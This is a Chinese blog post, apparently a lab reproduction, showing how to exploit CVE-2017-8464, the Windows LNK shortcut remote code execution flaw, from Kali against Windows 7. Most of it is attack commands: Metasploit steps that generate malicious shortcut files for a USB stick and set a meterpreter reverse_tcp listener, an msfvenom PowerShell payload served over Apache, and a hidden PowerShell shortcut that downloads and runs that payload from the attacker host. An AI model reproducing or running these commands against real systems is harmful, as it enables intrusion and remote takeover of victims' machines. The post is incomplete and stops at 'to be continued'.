美文网首页
CVE-2017-8464复现 (远程快捷方式漏洞)

CVE-2017-8464复现 (远程快捷方式漏洞)

作者: 二潘 | 来源:发表于2018-08-28 16:44 被阅读118次

    我们的人生才刚刚开始,请不要过早的否定你自己的价值,你的价值不是老板、经理、同事以及同学说了算,是你自己说了算,对于目前自己的工作、生活和状态,老子不服,就是不服~
    好啦(╹▽╹),上面就是吐槽一下自己的工作情况~下面才是本章的正题
    ——————————————————————————————————————————————————

    漏洞详情

    北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).

    CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。

    CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

    攻击机:kali
    IP地址为:192.168.10.118
    靶机:win7
    IP地址:192.168.10.119

    受影响的版本

    Windows 7
    Windows 8.1
    Windows RT 8.1
    Windows 10
    Windows Server 2008
    Windows Server 2008 R2
    Windows Server 2012
    Windows Server 2012 R2
    Windows Server 2016
    

    payload1:Metasploit中CVE-2017-8464模块制作U盘

    利用Metasploit成功利用
    如果kali 是版本比较新的话,可以不用下载工具,如果没有该工具,可以下载利用工具:https://github.com/rapid7/metasploit-framework/archive/master.zip
    安装:
    下载完成后将压缩包内modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb复制到目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat下。

    仅复制rb文件会出错,须再将压缩包内data/exploits中的cve-2017-8464文件夹复制到/usr/share/metasploit-framework/data/exploits中。

    安装完成之后,终端打开

    msfconsole
    search 2017_8464
    use exploit/windows/fileformat/cve_2017_8464_lnk_rce
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.10.118(你的IP)
    exploit
    
    image.png

    之后会在/root/.msf4/local目录下生成我们的利用文件
    注意:kali2.0下无法直接访问该文件夹,可通过命令行将/root/.msf4/local/下的所有文件复制到/root/1下

    cp -r /root/.msf4/local/ /root/1
    
    image.png

    全部复制到移动磁盘里面(u盘拷贝)
    然后在msf中监听

    search multi/handler
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.10.118 (你的IP地址)
    run
    
    image.png

    payload2:利用Powershell快捷键

    生成攻击文件:search.ps1,终端输入

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.118 -f psh-reflection>/opt/search.ps1
    
    image.png

    然后将/opt/目录下的search.ps1文件移动到/var/www/html/下

    随后打开Apache服务

    service apache2 start
    

    访问web下的sp1文件


    image.png

    然后在目标机上建立一个快捷方式

    powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.118/search.ps1');test.ps1"
    
    image.png

    这里写我们构造好的代码

    然后选中powershell.exe

    再到本机上配置监听

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.10.118
    run
    

    未完,待续~

    相关文章

      网友评论

          本文标题:CVE-2017-8464复现 (远程快捷方式漏洞)

          本文链接:https://www.haomeiwen.com/subject/nxidiftx.html